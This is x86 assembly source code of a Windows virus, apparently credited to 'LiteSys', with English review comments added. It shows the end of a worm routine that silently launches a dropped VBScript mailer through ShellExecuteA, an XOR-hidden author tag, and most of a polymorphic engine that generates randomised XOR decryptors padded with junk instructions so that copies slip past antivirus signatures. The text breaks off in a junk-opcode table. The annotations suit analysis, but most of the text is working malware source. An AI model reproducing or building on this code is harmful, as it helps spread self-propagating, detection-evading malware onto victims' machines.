CALL @VBS3                          ; CALL-over-string: pushes the address of "SHELL32.DLL"
|
|||
|
DB "SHELL32.DLL", 00h
|
|||
|
@VBS3: APICALL LoadLibraryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
CALL @VBS4                          ; same trick for the export name
|
|||
|
DB "ShellExecuteA", 00h, 5 DUP (90h)
|
|||
|
@VBS4: PUSH EAX
|
|||
|
APICALL GetProcAddress              ; resolved at run time, so SHELL32 never appears in the import table
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX                            ; nShowCmd = 0 (SW_HIDE)
|
|||
|
PUSH EBX                            ; lpDirectory = NULL
|
|||
|
PUSH EBX                            ; lpParameters = NULL
|
|||
|
LEA EDX, OFS [Raxelp_VBS]
|
|||
|
PUSH EDX                            ; lpFile = the dropped script
|
|||
|
PUSH EBX                            ; lpOperation = NULL -> the default verb registered for .vbs
|
|||
|
PUSH EBX                            ; hwnd = NULL
|
|||
|
CALL EAX                            ; ShellExecuteA(...) - this is what starts the mailer
|
|||
|
|
|||
|
@VBS_Fin:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]              ; unlink the SEH frame
|
|||
|
POP ECX                             ; discard the handler address
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
MOV DWO [GuardaEBP3], EBP           ; patch the MOV EBX immediate below so EBX survives POPAD
|
|||
|
POPAD
|
|||
|
|
|||
|
MOV EBX, 12345678h                  ; EBX = delta (immediate is GuardaEBP3, ORG $-4 trick)
|
|||
|
ORG $-4
|
|||
|
GuardaEBP3 DD 00000000h
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
CALL [EBX+ExitThread]               ; terminate this worker thread
|
|||
|
RET
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
@VBS_CierraTodo:
|
|||
|
|
|||
|
PUSH DWO [BaseMap_WVBS]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
@VBS_DesMapea:
|
|||
|
|
|||
|
PUSH DWO [MHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@VBS_CierraFile:
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH DWO [Scriptum]                 ; NOTE(review): Scriptum is WriteFile's bytes-written slot in Infecta_Word, unrelated to this file; 0 looks intended
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
JMP @VBS_Fin
|
|||
|
|
|||
|
; @Existe_Archivo - checks whether a file exists.
; (Original: "Rutina para revisar la existencia de un archivo.")
;
; In:   EBX -> file name (ANSI). A bare name is resolved against the current
;       directory, which Worm_VBS sets to the Windows directory beforehand.
; Out:  CF = 1 if FindFirstFileA succeeds, CF = 0 otherwise (or if the
;       scratch buffer could not be allocated).
; Clobbers EAX and flags. A WIN32_FIND_DATA is allocated with VirtualAlloc
; for every call and only DEcommitted, so the reservation is never released.
; NOTE(review): on the VirtualAlloc-failure path the EBX pushed at entry is
; still on the stack when @EA_Negativo executes RET, so control would go to
; that value instead of the caller; presumably the callers' SEH frame is what
; catches that - confirm before relying on the CF=0 result on that path.
|
|||
|
; EBX -> file name.
|
|||
|
; Returns CF=1 if the file exists.
|
|||
|
|
|||
|
@Existe_Archivo:
|
|||
|
|
|||
|
PUSH EBX                            ; keep the name across VirtualAlloc
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc                ; scratch WIN32_FIND_DATA
|
|||
|
MOV DWO [VAllocZ], EAX              ; stored into the PUSH immediate below (ORG $-4 trick)
|
|||
|
OR EAX, EAX
|
|||
|
JZ @EA_Negativo                     ; leaves the pushed EBX on the stack (see header note)
|
|||
|
POP EBX
|
|||
|
|
|||
|
PUSH EAX                            ; lpFindFileData
|
|||
|
PUSH EBX                            ; lpFileName
|
|||
|
APICALL FindFirstFileA
|
|||
|
INC EAX                             ; INVALID_HANDLE_VALUE (-1) -> 0
|
|||
|
JZ @EA_Negativo
|
|||
|
|
|||
|
DEC EAX
|
|||
|
PUSH EAX
|
|||
|
APICALL FindClose
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH 12345678h                      ; immediate is the variable VAllocZ
|
|||
|
ORG $-4
|
|||
|
VAllocZ DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
STC                                 ; exists
|
|||
|
RET 0
|
|||
|
|
|||
|
@EA_Negativo:
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH DWO [VAllocZ]                  ; may be NULL when VirtualAlloc failed; VirtualFree then just fails
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
CLC                                 ; does not exist / error
|
|||
|
RET 0
|
|||
|
|
|||
|
|
|||
|
Worm_VBS ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Author tag stored XOR 40h so the plain string does not appear in the
; binary; decodes to "[Designed by LiteSys]" followed by a NUL (40h XOR 40h).
; Nothing visible in this chunk references it - presumably a signature
; string only.
DB "[" XOR 40h
|
|||
|
DB "D" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "s" XOR 40h
|
|||
|
DB "i" XOR 40h
|
|||
|
DB "g" XOR 40h
|
|||
|
DB "n" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "d" XOR 40h
|
|||
|
DB " " XOR 40h
|
|||
|
DB "b" XOR 40h
|
|||
|
DB "y" XOR 40h
|
|||
|
DB " " XOR 40h
|
|||
|
DB "L" XOR 40h
|
|||
|
DB "i" XOR 40h
|
|||
|
DB "t" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "S" XOR 40h
|
|||
|
DB "y" XOR 40h
|
|||
|
DB "s" XOR 40h
|
|||
|
DB "]" XOR 40h
|
|||
|
DB 40h                              ; terminator: 40h XOR 40h = 0
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; PXPE: Plexar Polymorphic Engine (author's own description: "Another Lame
; Poly Written By Me").
;
; Emits a randomised XOR decryptor at EDI followed by an XOR-encrypted copy
; of the ECX DWORDs at ESI. The decryptor differs per call - random junk
; from @Basura between the fixed steps and several encodings of each step
; (@Popear_Delta, @Meter_Tamaño, @Colocar_LEA, @SumaCuatro) - but these
; bytes are written verbatim every time and are what a static signature
; would key on:
;   E8 00 00 00 00      CALL $+5                    (get-delta trick)
;   81 37 <key32>       XOR DWORD PTR [EDI], key     (decrypt one DWORD)
;   49                  DEC ECX
;   0F 85 <rel32>       JNZ back to the XOR
; The key is one 32-bit value for the whole body (single-DWORD XOR).
;
; ESI -> source (plaintext body)
|
|||
|
;
|
|||
|
; EDI -> destination (decryptor + encrypted body are written here)
|
|||
|
|
|||
|
; ECX -> size, in DWORDs (one MOVSD per @ReCopia iteration; the emitted
;        decryptor likewise steps EDI by 4 and counts down the same value)
|
|||
|
|
|||
|
|
|||
|
PXPE PROC
|
|||
|
|
|||
|
MOV DWO [Origen], ESI
|
|||
|
MOV DWO [Destino], EDI
|
|||
|
MOV DWO [Tama<EFBFBD>o], ECX
|
|||
|
|
|||
|
CALL @Inicializar_Semillas          ; seed the two LCGs (see notes there)
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX                             ; limit = 0FFFFFFFFh -> full-range key
|
|||
|
CALL @Aleatorio
|
|||
|
MOV DWO [Llave], EAX                ; XOR key
|
|||
|
|
|||
|
MOV EDI, DWO [Destino]              ; EDI = emit cursor for the rest of the routine
|
|||
|
|
|||
|
; DELTA - emit junk, then CALL $+5 so the decryptor can learn its own address
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
POP EDX
|
|||
|
SUB EDX, EDI                        ; EDX = -(length of the leading junk)
|
|||
|
MOV DWO [GuardaDelta2], EDX
|
|||
|
|
|||
|
MOV AL, 0E8h ; CALL
|
|||
|
STOSB
|
|||
|
XOR EAX, EAX ; Delta - rel32 = 0, i.e. CALL to the next instruction
|
|||
|
STOSD
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @Popear_Delta                  ; pop the pushed address into a register, subtract an immediate (patched below)
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @Meter_Tama<EFBFBD>o                  ; ECX = DWORD count, in one of several encodings
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
CALL @Colocar_Lea                   ; EDI = delta register + Origen -> the encrypted body
|
|||
|
CALL @Basura
|
|||
|
MOV DWO [GuardaLoop], EDI           ; loop head (target of the JNZ below)
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
MOV AX, 03781h ; XOR DWORD PTR [EDI], imm32
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [Llave]
|
|||
|
STOSD
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @SumaCuatro                    ; EDI += 4, in one of several encodings
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
MOV AL, 049h                        ; DEC ECX
|
|||
|
STOSB
|
|||
|
MOV AX, 850Fh                       ; JNZ rel32
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [GuardaLoop]
|
|||
|
SUB EAX, EDI
|
|||
|
SUB EAX, 04h                        ; rel32 is relative to the end of the 6-byte JNZ
|
|||
|
STOSD
|
|||
|
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
; Fix up the immediate left by @Popear_Delta: by my reading, after the
; subtraction the delta register equals (runtime body address - Origen), so
; that register + Origen (emitted by @Colocar_LEA) points at the encrypted
; body that is copied right after this decryptor.
MOV EAX, EDI
|
|||
|
SUB EAX, DWO [Destino]              ; EAX = total decryptor length
|
|||
|
SUB EAX, 05h                        ; minus the CALL itself
|
|||
|
MOV EBX, DWO [GuardaDelta]          ; address of the immediate inside the decryptor
|
|||
|
SUB DWORD PTR [EBX], EAX
|
|||
|
MOV EDX, DWO [GuardaDelta2]
|
|||
|
SUB DWORD PTR [EBX], EDX            ; EDX is negative: adds back the leading junk length
|
|||
|
|
|||
|
MOV ESI, DWO [Origen]
|
|||
|
MOV ECX, DWO [Tama<EFBFBD>o]
|
|||
|
MOV EAX, DWO [Llave]
|
|||
|
|
|||
|
@ReCopia:
|
|||
|
MOVSD                               ; copy one DWORD...
|
|||
|
XOR DWORD PTR [EDI-4h], EAX         ; ...and encrypt it in place with the single key
|
|||
|
LOOP @ReCopia
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
; @Inicializar_Semillas - seeds Semilla_1 and Semilla_2 for @Aleatorio.
;
; Semilla_1 = CRC32 over the low 32 bits of RDTSC (EDX, the high half, is
; discarded). The GetTickCount value computed for Semilla_2 is never stored
; anywhere: CRC32 is called over the same 4 bytes at @SaveSemilla, so unless
; CRC32 folds EAX into its result (its interface here is ESI=buffer,
; EDI=length), Semilla_2 ends up equal to Semilla_1 and the whole engine is
; keyed by a single 32-bit TSC sample. Worth knowing when reasoning about how
; many distinct decryptors/keys a sample can actually produce.
; Clobbers EAX, EDX, ESI, EDI and flags.
|
|||
|
|
|||
|
LEA EDI, OFS [@SaveSemilla]
|
|||
|
RDTSC
|
|||
|
STOSD                               ; only EAX (low 32 bits) is kept
|
|||
|
PUSH 04h
|
|||
|
POP EDI                             ; EDI = length for CRC32
|
|||
|
LEA ESI, OFS [@SaveSemilla]
|
|||
|
CALL CRC32
|
|||
|
MOV DWO [Semilla_1], EAX
|
|||
|
|
|||
|
APICALL GetTickCount
|
|||
|
ADD EAX, EAX
|
|||
|
NOT EAX ; (author's aside) - this value is never written to @SaveSemilla
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
LEA ESI, OFS [@SaveSemilla]         ; same 4 bytes as above
|
|||
|
CALL CRC32
|
|||
|
MOV DWO [Semilla_2], EAX
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
; @Aleatorio - a crude pseudo-random number generator (the author's own
; description). Two independent 32-bit LCGs are stepped, their new states are
; written to Milonga and CRC32'd together, and the CRC is reduced modulo EBX.
;
; In:   EBX = upper bound (exclusive). Must be non-zero: DIV EBX would raise
;       #DE for 0. Callers in this file pass 3..35 or 0FFFFFFFFh.
; Out:  EAX = value in [0, EBX)
; Preserves EBX (its value is re-popped below), ECX, EDX, EDI. Clobbers ESI
; and flags; the 8 bytes at Milonga are overwritten on every call.
; The CRC32 routine is defined elsewhere (ESI=buffer, EDI=length, EAX=result).
|
|||
|
;
|
|||
|
; EBX -> upper bound (exclusive).
|
|||
|
|
|||
|
@Aleatorio:
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
PUSH ECX
|
|||
|
PUSH EDX
|
|||
|
PUSH EBX                            ; limit, re-popped before the DIV
|
|||
|
|
|||
|
MOV EAX, DWO [Semilla_1]
|
|||
|
IMUL EAX, Mierda_1                  ; LCG #1: s = s*1A7FC23Bh + 28B1h
|
|||
|
ADD EAX, Mierda_2
|
|||
|
MOV DWO [Semilla_1], EAX
|
|||
|
|
|||
|
LEA EDI, OFS [Milonga]
|
|||
|
STOSD                               ; Milonga[0..3] = new state 1
|
|||
|
|
|||
|
MOV EBX, DWO [Semilla_2]
|
|||
|
IMUL EBX, Mierda_3                  ; LCG #2: s = s*974D9DB5h + 0F3C9h
|
|||
|
ADD EBX, Mierda_4
|
|||
|
MOV DWO [Semilla_2], EBX
|
|||
|
XCHG EAX, EBX
|
|||
|
STOSD                               ; Milonga[4..7] = new state 2
|
|||
|
|
|||
|
LEA ESI, OFS [Milonga]
|
|||
|
PUSH 08h
|
|||
|
POP EDI                             ; length for CRC32
|
|||
|
CALL CRC32                          ; EAX = CRC32(Milonga, 8)
|
|||
|
|
|||
|
POP EBX                             ; EBX = limit again
|
|||
|
XOR EDX, EDX                        ; EDX:EAX = CRC, unsigned divide
|
|||
|
DIV EBX
|
|||
|
|
|||
|
XCHG EDX, EAX                       ; EAX = remainder
|
|||
|
|
|||
|
POP EDX
|
|||
|
POP ECX
|
|||
|
POP EDI
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
Milonga DB 9 DUP (00h)              ; 8 bytes used by the two STOSDs above; 9th byte is spare
|
|||
|
|
|||
|
@Popear_Delta:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Popear_Delta_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Popear_Delta_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Popear_Delta_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @Popear_Delta_IV
|
|||
|
|
|||
|
JMP @Popear_Delta_IV
|
|||
|
|
|||
|
@Popear_Delta_R:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Popear_Delta_I:
|
|||
|
MOV AL, 05Dh ; POP EBP
|
|||
|
STOSB
|
|||
|
MOV AX, 0ED81h ; SUB EBP
|
|||
|
STOSW
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_II:
|
|||
|
MOV AL, 058h
|
|||
|
STOSB
|
|||
|
MOV AL, 02Dh
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 095h
|
|||
|
STOSB
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_III:
|
|||
|
MOV AL, 05Bh
|
|||
|
STOSB
|
|||
|
MOV AL, 0BAh
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AX, 0D329h
|
|||
|
STOSW
|
|||
|
MOV AX, 0DD87h
|
|||
|
STOSW
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_IV:
|
|||
|
MOV AL, 05Ah
|
|||
|
STOSB
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 05Dh
|
|||
|
STOSB
|
|||
|
MOV AX, 0D587h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D529h
|
|||
|
STOSW
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Meter_Tama<EFBFBD>o_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_IV
|
|||
|
|
|||
|
JMP @Meter_Tama<EFBFBD>o_III
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>oR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_I:
|
|||
|
MOV AL, 0B9h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
STOSD
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_II:
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
STOSD
|
|||
|
MOV AL, 059h
|
|||
|
STOSB
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_III:
|
|||
|
MOV AL, 0BAh
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
NOT EAX
|
|||
|
STOSD
|
|||
|
MOV AX, 0CA87h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D1F7h
|
|||
|
STOSW
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_IV:
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
XCHG EDX, EAX
|
|||
|
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, EDX
|
|||
|
STOSD
|
|||
|
MOV AL, 058h
|
|||
|
STOSB
|
|||
|
MOV AL, 035h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
XOR EAX, EDX
|
|||
|
STOSD
|
|||
|
MOV AL, 091h
|
|||
|
STOSB
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Colocar_LEA:
|
|||
|
|
|||
|
PUSH 03h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Colocar_Lea_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Colocar_Lea_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Colocar_Lea_III
|
|||
|
|
|||
|
JMP @Colocar_Lea_II
|
|||
|
|
|||
|
@Colocar_LEAR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Colocar_LEA_I:
|
|||
|
MOV AX, 0BD8Dh
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@Colocar_LEA_II:
|
|||
|
MOV AL, 0BFh
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AX, 0EF01h
|
|||
|
STOSW
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@Colocar_LEA_III:
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 05Ah
|
|||
|
STOSB
|
|||
|
MOV AX, 0EA01h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D787h
|
|||
|
STOSW
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@SumaCuatro:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @SumaCuatro_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @SumaCuatro_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @SumaCuatro_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @SumaCuatro_IV
|
|||
|
|
|||
|
JMP @SumaCuatro_III
|
|||
|
|
|||
|
@SumaCuatroR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@SumaCuatro_I:
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000004h
|
|||
|
STOSD
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_II:
|
|||
|
MOV EAX, 47474747h
|
|||
|
STOSD
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_III:
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000002h
|
|||
|
STOSD
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_IV:
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000003h
|
|||
|
STOSD
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
; Generador de basura! Mega Lamer!!!
|
|||
|
|
|||
|
@Basura:
|
|||
|
|
|||
|
PUSH 10d
|
|||
|
POP ECX
|
|||
|
|
|||
|
@BasLoop:
|
|||
|
|
|||
|
PUSH 08d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Basura_1
|
|||
|
CMP EAX, 1h
|
|||
|
JZ @Basura_2
|
|||
|
CMP EAX, 2h
|
|||
|
JZ @Basura_3
|
|||
|
CMP EAX, 3h
|
|||
|
JZ @Basura_4
|
|||
|
CMP EAX, 4h
|
|||
|
JZ @Basura_5
|
|||
|
CMP EAX, 5h
|
|||
|
JZ @Basura_6
|
|||
|
CMP EAX, 6h
|
|||
|
JZ @Basura_7
|
|||
|
|
|||
|
JMP @Basura_1
|
|||
|
|
|||
|
@BasuraR:
|
|||
|
|
|||
|
LOOP @BasLoop
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Basura_1:
|
|||
|
|
|||
|
PUSH 07h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B1_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B1_Tabla:
|
|||
|
DB 0B8h ; MOV EAX
|
|||
|
DB 0BBh ; MOV EBX
|
|||
|
DB 0BAh ; MOV EDX
|
|||
|
DB 0BEh ; MOV ESI
|
|||
|
DB 005h ; ADD EAX
|
|||
|
DB 02Dh ; SUB EAX
|
|||
|
DB 035h ; XOR EAX
|
|||
|
DB 015h ; ADC EAX
|
|||
|
|
|||
|
@Basura_2:
|
|||
|
|
|||
|
PUSH 15d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
ADD EAX, EAX
|
|||
|
LEA ESI, OFS [@B2_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B2_Tabla:
|
|||
|
DB 081h, 0C3h ; ADD EBX
|
|||
|
DB 081h, 0C2h ; ADD EDX
|
|||
|
DB 081h, 0C6h ; ADD ESI
|
|||
|
DB 081h, 0EBh ; SUB EBX
|
|||
|
DB 081h, 0EAh ; SUB EDX
|
|||
|
DB 081h, 0EEh ; SUB ESI
|
|||
|
DB 081h, 0F6h ; XOR ESI
|
|||
|
DB 081h, 0F2h ; XOR EDX
|
|||
|
DB 081h, 0F3h ; XOR EBX
|
|||
|
DB 081h, 0D3h ; ADC EBX
|
|||
|
DB 081h, 0D2h ; ADC EDX
|
|||
|
DB 081h, 0D6h ; ADC ESI
|
|||
|
DB 069h, 0C0h ; IMUL EAX
|
|||
|
DB 069h, 0DBh ; IMUL EBX
|
|||
|
DB 069h, 0D2h ; IMUL EDX
|
|||
|
DB 069h, 0F6h ; IMUL ESI
|
|||
|
|
|||
|
@Basura_3:
|
|||
|
|
|||
|
PUSH 35d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
ADD EAX, EAX
|
|||
|
LEA ESI, OFS [@B3_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B3_Tabla:
|
|||
|
DB 001h, 0D8h ; ADD EAX, EBX
|
|||
|
DB 001h, 0D0h ; ADD EAX, EDX
|
|||
|
DB 001h, 0F0h ; ADD EAX, ESI
|
|||
|
DB 001h, 0D3h ; ADD EBX, EDX
|
|||
|
DB 001h, 0F3h ; ADD EBX, ESI
|
|||
|
DB 001h, 0C3h ; ADD EBX, EAX
|
|||
|
DB 001h, 0DAh ; ADD EDX, EBX
|
|||
|
DB 001h, 0F2h ; ADD EDX, ESI
|
|||
|
DB 001h, 0C2h ; ADD EDX, EAX
|
|||
|
DB 001h, 0DEh ; ADD ESI, EBX
|
|||
|
DB 001h, 0D6h ; ADD ESI, EDX
|
|||
|
DB 001h, 0C6h ; ADD ESI, EAX
|
|||
|
DB 029h, 0D8h ; SUB EAX, EBX
|
|||
|
DB 029h, 0D0h ; SUB EAX, EDX
|
|||
|
DB 029h, 0F0h ; SUB EAX, ESI
|
|||
|
DB 029h, 0C3h ; SUB EBX, EAX
|
|||
|
DB 029h, 0D3h ; SUB EBX, EDX
|
|||
|
DB 029h, 0F3h ; SUB EBX, ESI
|
|||
|
